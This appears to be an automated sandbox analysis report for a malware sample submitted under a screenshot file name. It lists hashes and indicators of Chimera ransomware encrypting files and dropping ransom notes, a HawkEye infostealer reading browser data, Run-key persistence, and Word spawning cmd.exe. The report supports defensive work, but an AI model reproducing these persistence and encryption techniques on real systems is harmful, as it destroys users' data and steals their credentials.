Resubmissions
08-09-2023 19:19
230908-x1zdesfa2w 1008-09-2023 19:08
230908-xtd4xaeh7t 608-09-2023 19:07
230908-xs5kgaeg85 308-09-2023 18:58
230908-xmy6haeg56 708-09-2023 17:30
230908-v3hscaea96 8Analysis
-
max time kernel
912s -
max time network
844s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
08-09-2023 19:19
Static task
static1
Behavioral task
behavioral1
Sample
Captura de pantalla 2023-03-05 184332.png
Resource
win10v2004-20230831-en
General
-
Target
Captura de pantalla 2023-03-05 184332.png
-
Size
47KB
-
MD5
c662c6bef8d03268babc40558500c421
-
SHA1
33881cac944362c415ce1c000d0e6c43e7b8fd57
-
SHA256
1be92987b9ab334d25c940577da37ccbbd417b2e4e52b97b668347d90e1eeabb
-
SHA512
4f7f75247e717337309d73004a79a0986911fa0525f36f41dc5be3ca3a0ed2033575737ceded69895a77626cb6e90152bdb0ea16655e6a8048731301e11802be
-
SSDEEP
768:UZ+vjsWKoGWORUYGnBAPmxVU68vKbLxY0OKZY+S7SaLeP2MeqrsP4/jx4Lbf2:UnRofGoLJ8ib75a+kSaLK2Z+sA/eO
Malware Config
Signatures
-
Chimera 64 IoCs
Ransomware which infects local and network files, often distributed via Dropbox links.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe -
Chimera Ransomware Loader DLL 1 IoCs
Drops/unpacks executable file which resembles Chimera's Loader.dll.
resource yara_rule behavioral1/memory/4744-2323-0x0000000010000000-0x0000000010010000-memory.dmp chimera_loader_dll -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3204 648 cmd.exe 166 Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2160 648 WerFault.exe 166 -
Renames multiple (4029) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule behavioral1/files/0x000600000002349d-1981.dat office_macro_on_action -
resource behavioral1/files/0x00060000000234e3-1798.dat behavioral1/files/0x0007000000023506-1978.dat behavioral1/files/0x000600000002349d-1981.dat -
Executes dropped EXE 7 IoCs
pid Process 4036 butterflyondesktop.exe 4592 butterflyondesktop.tmp 4188 ButterflyOnDesktop.exe 4744 HawkEye.exe 4084 rickroll.exe 2944 rickroll.exe 4384 YouAreAnIdiot.exe -
Loads dropped DLL 4 IoCs
pid Process 3892 taskmgr.exe 684 taskmgr.exe 4384 YouAreAnIdiot.exe 4384 YouAreAnIdiot.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Admin\Links\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Videos\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Desktop\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Libraries\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Music\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Downloads\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Program Files\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Searches\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Pictures\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Music\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Users\Public\Documents\desktop.ini ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\desktop.ini ButterflyOnDesktop.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 293 bot.whatismyipaddress.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-200_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-24.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageMedTile.scale-400.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml ButterflyOnDesktop.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-100_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MedTile.scale-200_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.targetsize-20_altform-unplated_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-200.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-72.png ButterflyOnDesktop.exe File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-100.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_altform-unplated_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\FetchingMail.scale-125.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-400.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\is-IS\View3d\3DViewerProductDescription-universal.xml ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\export.svg ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_SplashScreen.scale-100.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-24.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-16.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-400.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsBadgeLogo.scale-100.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-32_altform-unplated_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.jpg ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_18.svg ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-125_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\186.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigNose.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-100_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-20_altform-fullcolor.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-unplated.png ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\ui-strings.js ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\WideTile.scale-125.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-60_altform-unplated.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-72_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\WideTile.scale-125.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\StoreLogo.scale-125.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-100_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-100_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in-2x.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\StopwatchSmallTile.contrast-black_scale-200.png 